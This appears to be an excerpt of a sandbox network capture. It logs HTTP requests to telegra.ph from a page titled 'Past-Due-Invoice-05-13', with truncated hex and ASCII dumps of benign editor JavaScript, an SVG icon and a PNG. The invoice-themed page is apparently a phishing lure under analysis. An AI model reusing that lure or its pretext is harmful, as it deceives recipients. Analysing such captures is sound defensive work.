2022-05-13 18:46:44 UTC	367	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 51 75 69 6c 6c 3d 65 28 29 3a 74 2e 51 75 69 6c 6c 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 Data Ascii: !function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Quill=e():t.Quill=e()}(this,function(){return function(t){function e(r){if(n[r])return
2022-05-13 18:46:44 UTC	383	IN	Data Raw: 22 2d 22 29 7d 29 7d 76 61 72 20 6f 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 65 78 74 65 6e 64 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 74 7d 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 72 29 26 26 28 74 5b 72 5d 3d 65 5b 72 5d 29 3b 74 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 75 6c 6c 3d 3d 3d 65 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 29 3a 28 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 65 77 20 6e 29 7d 2c 69 3d 6e 28 38 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 Data Ascii: "-")})}var o=this&&this.__extends\|\|function(t,e){function n(){this.constructor=t}for(var r in e)e.hasOwnProperty(r)&&(t[r]=e[r]);t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)},i=n(8),l=function(t){function e(){t.apply(this,argument
2022-05-13 18:46:44 UTC	432	IN	Data Raw: 2c 6e 3d 69 5b 33 5d 2c 61 2e 63 61 6c 6c 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 65 64 69 74 6f 72 2e 64 65 6c 65 74 65 54 65 78 74 28 74 2c 65 29 7d 2c 6e 2c 74 2c 2d 31 2a 65 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 73 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 65 28 21 31 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 74 68 69 73 2e 73 63 72 6f 6c 6c 2e 65 6e 61 62 6c 65 28 74 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 Data Ascii: ,n=i[3],a.call(this,function(){return r.editor.deleteText(t,e)},n,t,-1*e)}},{key:"disable",value:function(){this.enable(!1)}},{key:"enable",value:function(){var t=!(arguments.length>0&&void 0!==arguments[0])\|\|arguments[0];this.scroll.enable(t),this.contai
2022-05-13 18:46:44 UTC	448	IN	Data Raw: 72 6e 21 31 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 3d 3d 74 79 70 65 6f 66 20 65 7d 76 61 72 20 6c 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2c 61 3d 6e 28 32 33 29 2c 73 3d 6e 28 32 34 29 2c 75 3d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 7c 7c 28 6e 3d 7b 7d 29 2c 74 3d 3d 3d 65 7c 7c 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 3f 74 2e 67 65 74 54 69 6d 65 28 29 3d 3d 3d 65 2e 67 65 74 54 69 6d 65 28 29 3a 21 74 7c 7c 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 26 26 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 3f 6e 2e 73 74 72 69 63 74 3f 74 3d 3d 3d 65 3a 74 3d Data Ascii: rn!1;return typeof t==typeof e}var l=Array.prototype.slice,a=n(23),s=n(24),u=t.exports=function(t,e,n){return n\|\|(n={}),t===e\|\|(t instanceof Date&&e instanceof Date?t.getTime()===e.getTime():!t\|\|!e\|\|"object"!=typeof t&&"object"!=typeof e?n.strict?t===e:t=
2022-05-13 18:46:44 UTC	464	IN	Data Raw: 29 2c 6b 3d 31 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 6f 28 74 68 69 73 2c 65 29 2c 69 28 74 68 69 73 2c 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 72 65 74 75 72 6e 20 6c 28 65 2c 74 29 2c 73 28 65 2c 5b 7b 6b 65 79 3a 22 61 74 74 61 63 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 75 28 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 61 74 74 61 63 68 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 Data Ascii: ),k=1,E=function(t){function e(){return o(this,e),i(this,(e.__proto__\|\|Object.getPrototypeOf(e)).apply(this,arguments))}return l(e,t),s(e,[{key:"attach",value:function(){u(e.prototype.__proto__\|\|Object.getPrototypeOf(e.prototype),"attach",this).call(this)
2022-05-13 18:46:44 UTC	480	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 6f 2c 69 29 7b 76 61 72 20 61 3d 6c 3f 6c 2b 74 3a 74 3b 69 66 28 21 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 61 5d 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 73 2c 75 2c 63 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 61 5d 2c 66 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 66 28 63 2e 66 6e 29 7b 73 77 69 74 63 68 28 63 2e 6f 6e 63 65 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 28 74 2c 63 2e 66 6e 2c 76 6f 69 64 20 30 2c 21 30 29 2c 66 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 63 2e 66 6e 2e 63 61 6c 6c 28 63 2e 63 6f 6e 74 65 78 74 29 2c 21 30 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 63 2e 66 6e 2e 63 61 6c 6c 28 63 2e 63 6f 6e 74 65 78 74 2c 65 29 2c 21 30 3b 63 61 Data Ascii: function(t,e,n,r,o,i){var a=l?l+t:t;if(!this._events[a])return!1;var s,u,c=this._events[a],f=arguments.length;if(c.fn){switch(c.once&&this.removeListener(t,c.fn,void 0,!0),f){case 1:return c.fn.call(c.context),!0;case 2:return c.fn.call(c.context,e),!0;ca
2022-05-13 18:46:44 UTC	512	IN	Data Raw: 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 26 26 74 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 26 26 74 28 65 2c 72 29 2c 65 7d 7d 28 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 20 6b 28 74 2c 65 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d Data Ascii: (t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}return function(e,n,r){return n&&t(e.prototype,n),r&&t(e,r),e}}(),c=function k(t,e,n){null===t&&(t=
2022-05-13 18:46:44 UTC	528	IN	Data Raw: 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 79 28 6f 2c 65 2c 6e 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 72 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3b 76 61 72 20 69 3d 72 2e 67 65 74 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 6e 29 7d 2c 75 3d 6e 28 32 29 2c 63 3d 72 28 75 29 2c 66 3d 7b 73 63 6f 70 65 3a 63 5b 22 64 65 66 61 75 6c 74 22 5d 2e 53 63 6f 70 65 2e 49 4e 4c 49 4e 45 2c 77 68 69 74 65 6c 69 73 74 3a 5b 22 73 65 72 69 66 22 2c 22 6d 6f 6e 6f 73 70 61 63 65 22 5d 7d 2c 70 3d 6e 65 77 20 63 5b 22 64 65 66 61 75 6c 74 22 5d 2e 41 74 74 72 69 62 75 74 6f 72 2e 43 6c 61 73 73 28 22 66 6f 6e 74 22 2c 22 71 6c 2d 66 6f 6e 74 22 2c 66 29 2c 68 3d 66 Data Ascii: peOf(t);return null===o?void 0:y(o,e,n)}if("value"in r)return r.value;var i=r.get;if(void 0!==i)return i.call(n)},u=n(2),c=r(u),f={scope:c["default"].Scope.INLINE,whitelist:["serif","monospace"]},p=new c["default"].Attributor.Class("font","ql-font",f),h=f
2022-05-13 18:46:44 UTC	544	IN	Data Raw: 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 26 26 74 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 26 26 74 28 65 2c 72 29 2c 65 7d 7d 28 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 65 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 72 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 50 Data Ascii: alue"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}return function(e,n,r){return n&&t(e.prototype,n),r&&t(e,r),e}}(),s=function h(t,e,n){null===t&&(t=Function.prototype);var r=Object.getOwnPropertyDescriptor(t,e);if(void 0===r){var o=Object.getP
2022-05-13 18:46:44 UTC	560	IN	Data Raw: 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 26 26 74 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 26 26 74 28 65 2c 72 29 2c 65 7d 7d 28 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 2c 6e 29 7b Data Ascii: (){function t(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}return function(e,n,r){return n&&t(e.prototype,n),r&&t(e,r),e}}(),s=function d(t,e,n){
2022-05-13 18:46:44 UTC	576	IN	Data Raw: 76 67 20 76 69 65 77 62 6f 78 3d 22 30 20 30 20 31 38 20 31 38 22 3e 20 3c 67 20 63 6c 61 73 73 3d 22 71 6c 2d 66 69 6c 6c 20 71 6c 2d 63 6f 6c 6f 72 2d 6c 61 62 65 6c 22 3e 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 36 20 36 2e 38 36 38 20 36 20 36 20 35 20 36 20 35 20 37 20 35 2e 39 34 32 20 37 20 36 20 36 2e 38 36 38 22 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 20 3c 72 65 63 74 20 68 65 69 67 68 74 3d 31 20 77 69 64 74 68 3d 31 20 78 3d 34 20 79 3d 34 3e 3c 2f 72 65 63 74 3e 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 36 2e 38 31 37 20 35 20 36 20 35 20 36 20 36 20 36 2e 33 38 20 36 20 36 2e 38 31 37 20 35 22 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 20 3c 72 65 63 74 20 68 65 69 67 68 74 3d 31 20 77 69 64 74 68 3d 31 20 78 3d 32 20 79 3d 36 3e 3c Data Ascii: vg viewbox="0 0 18 18"> <g class="ql-fill ql-color-label"> <polygon points="6 6.868 6 6 5 6 5 7 5.942 7 6 6.868"></polygon> <rect height=1 width=1 x=4 y=4></rect> <polygon points="6.817 5 6 5 6 6 6.38 6 6.817 5"></polygon> <rect height=1 width=1 x=2 y=6><
2022-05-13 18:46:44 UTC	592	IN	Data Raw: 66 20 45 76 65 6e 74 29 74 68 69 73 2e 73 65 6c 65 63 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 63 68 61 6e 67 65 22 29 29 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 45 76 65 6e 74 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 45 76 65 6e 74 29 29 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 45 76 65 6e 74 22 29 3b 72 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 68 61 6e 67 65 22 2c 21 30 2c 21 30 29 2c 74 68 69 73 2e 73 65 6c 65 63 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 72 29 7d 74 68 69 73 2e 63 6c 6f 73 65 28 29 7d 7d 65 6c 73 65 20 74 68 69 73 2e 6c 61 62 65 6c 2e 72 65 6d 6f 76 65 41 74 Data Ascii: f Event)this.select.dispatchEvent(new Event("change"));else if("object"===("undefined"==typeof Event?"undefined":i(Event))){var r=document.createEvent("Event");r.initEvent("change",!0,!0),this.select.dispatchEvent(r)}this.close()}}else this.label.removeAt
2022-05-13 18:46:44 UTC	608	IN	Data Raw: 6f 6c 6c 54 6f 70 3d 74 7d 7d 2c 7b 6b 65 79 3a 22 73 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 74 65 78 74 62 6f 78 2e 76 61 6c 75 65 3b 73 77 69 74 63 68 28 74 68 69 73 2e 72 6f 6f 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 6f 64 65 22 29 29 7b 63 61 73 65 22 6c 69 6e 6b 22 3a 76 61 72 20 65 3d 74 68 69 73 2e 71 75 69 6c 6c 2e 72 6f 6f 74 2e 73 63 72 6f 6c 6c 54 6f 70 3b 74 68 69 73 2e 6c 69 6e 6b 52 61 6e 67 65 3f 28 74 68 69 73 2e 71 75 69 6c 6c 2e 66 6f 72 6d 61 74 54 65 78 74 28 74 68 69 73 2e 6c 69 6e 6b 52 61 6e 67 65 2c 22 6c 69 6e 6b 22 2c 74 2c 79 5b 22 64 65 66 61 75 6c 74 22 5d 2e 73 6f 75 72 63 65 73 2e 55 53 45 52 29 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 6c 69 Data Ascii: ollTop=t}},{key:"save",value:function(){var t=this.textbox.value;switch(this.root.getAttribute("data-mode")){case"link":var e=this.quill.root.scrollTop;this.linkRange?(this.quill.formatText(this.linkRange,"link",t,y["default"].sources.USER),delete this.li

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:44 UTC	367	OUT	GET /js/core.min.js?63 HTTP/1.1 Host: telegra.ph Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:44 UTC	400	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:44 GMT Content-Type: application/javascript Content-Length: 49259 Last-Modified: Mon, 11 Apr 2022 15:14:50 GMT Connection: close ETag: "625445ea-c06b" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Accept-Ranges: bytes
2022-05-13 18:46:44 UTC	400	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 5f 63 6c 61 73 73 43 61 6c 6c 43 68 65 63 6b 28 74 2c 65 29 7b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 70 6f 73 73 69 62 6c 65 43 6f 6e 73 74 72 75 63 74 6f 72 52 65 74 75 72 6e 28 74 2c 65 29 7b 69 66 28 21 74 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 Data Ascii: "use strict";function _classCallCheck(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function _possibleConstructorReturn(t,e){if(!t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");r
2022-05-13 18:46:44 UTC	416	IN	Data Raw: 73 65 74 28 29 2c 72 2e 6c 65 6e 67 74 68 28 29 2d 31 29 2c 71 75 69 6c 6c 2e 73 65 6c 65 63 74 69 6f 6e 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 29 2c 73 68 6f 77 45 72 72 6f 72 28 22 54 69 74 6c 65 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 22 29 7d 76 61 72 20 61 3d 24 28 27 69 6d 67 5b 73 72 63 5e 3d 22 64 61 74 61 3a 22 5d 2c 76 69 64 65 6f 5b 73 72 63 5e 3d 22 64 61 74 61 3a 22 5d 27 29 3b 69 66 28 61 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 73 68 6f 77 45 72 72 6f 72 28 22 55 70 6c 6f 61 64 20 69 6e 20 70 72 6f 67 72 65 73 73 2e 5c 6e 50 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 22 29 3b 76 61 72 20 6e 3d 67 65 74 50 61 67 65 43 6f 6e 74 65 6e 74 28 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 3e 36 35 35 33 36 29 72 65 74 75 72 6e 20 73 68 6f 77 45 Data Ascii: set(),r.length()-1),quill.selection.scrollIntoView(),showError("Title is too small")}var a=$('img[src^="data:"],video[src^="data:"]');if(a.length)return showError("Upload in progress.\nPlease wait...");var n=getPageContent();if(n.length>65536)return showE
2022-05-13 18:46:44 UTC	496	IN	Data Raw: 68 6f 72 42 6c 6f 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 5f 63 6c 61 73 73 43 61 6c 6c 43 68 65 63 6b 28 74 68 69 73 2c 65 29 2c 5f 70 6f 73 73 69 62 6c 65 43 6f 6e 73 74 72 75 63 74 6f 72 52 65 74 75 72 6e 28 74 68 69 73 2c 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 72 65 74 75 72 6e 20 5f 69 6e 68 65 72 69 74 73 28 65 2c 74 29 2c 5f 63 72 65 61 74 65 43 6c 61 73 73 28 65 2c 5b 7b 6b 65 79 3a 22 66 6f 72 6d 61 74 41 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 6c 2c 69 29 7b 6c 3d 3d 3d 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 Data Ascii: horBlot=function(t){function e(){return _classCallCheck(this,e),_possibleConstructorReturn(this,(e.__proto__\|\|Object.getPrototypeOf(e)).apply(this,arguments))}return _inherits(e,t),_createClass(e,[{key:"formatAt",value:function(t,o,l,i){l===this.construct
2022-05-13 18:46:44 UTC	512	IN	Data Raw: 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 61 76 65 50 61 67 65 28 29 7d 29 2c 24 65 64 69 74 5f 62 75 74 74 6f 6e 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 75 70 64 61 74 65 45 64 69 74 61 62 6c 65 28 21 30 29 7d 29 2c 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 73 63 72 6f 6c 6c 20 72 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 6f 6f 6c 74 69 70 55 70 64 61 74 65 50 6f 73 69 74 69 6f 6e 28 24 74 6c 5f 74 6f 6f 6c 74 69 70 2c 6e 75 6c 6c 2c 66 6f 72 6d 61 74 54 54 4f 70 74 69 6f 6e 73 29 2c 74 6f 6f 6c 74 69 70 55 70 64 61 74 65 50 6f 73 69 74 69 6f 6e 28 24 74 6c 5f 6c 69 6e 6b 5f 74 6f 6f 6c 74 69 70 2c 6e 75 6c 6c 2c 6c 69 6e 6b 54 54 4f 70 74 69 6f 6e 73 29 7d 29 2c 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 77 Data Ascii: click(function(){savePage()}),$edit_button.click(function(){updateEditable(!0)}),$(window).on("scroll resize",function(){tooltipUpdatePosition($tl_tooltip,null,formatTTOptions),tooltipUpdatePosition($tl_link_tooltip,null,linkTTOptions)}),(new Image).src=w

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:44 UTC	399	OUT	GET /file/9f1d012ceb04882d3fbb6.png HTTP/1.1 Host: telegra.ph Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:44 UTC	613	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:44 GMT Content-Type: image/png Content-Length: 20268 Connection: close Cache-Control: max-age=2592000, public Expires: Sun, 12 Jun 2022 18:46:44 GMT ETag: "634ba9f4c887afc0b1da51b2dd75bc0db756e53f" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2022-05-13 18:46:44 UTC	614	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 55 00 00 01 a8 08 06 00 00 00 ae 6c cf 28 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 4e ce 49 44 41 54 78 5e ed bd 09 98 1c 55 bd bf 9f 99 4c 92 49 66 b2 67 26 fb be 6f 93 90 84 90 95 25 04 12 b6 00 49 08 11 90 1d 04 14 e4 82 80 a2 28 20 3f 51 41 59 95 45 71 17 94 45 dc 15 37 e4 aa 97 eb a3 7f ff 8a e0 8a f7 f2 53 11 41 40 d0 00 01 92 7c 7f f5 39 3d 35 d3 3d 73 6a fa cc 74 f5 74 f7 cc fb 3e cf fb 90 74 9d 3a 55 e7 74 cd 70 3e 39 55 a7 fa 18 00 00 00 00 00 00 74 19 42 15 00 00 00 00 00 40 01 10 aa 00 00 00 00 00 00 0a 80 50 05 00 00 00 00 00 50 00 84 2a 00 00 00 00 00 80 02 20 54 01 00 00 00 00 00 14 00 a1 0a 00 00 00 00 00 a0 Data Ascii: PNGIHDRUl(gAMAapHYsodNIDATx^ULIfg&o%I( ?QAYEqE7SA@\|9=5=sjtt>t:Utp>9UtB@PP* T
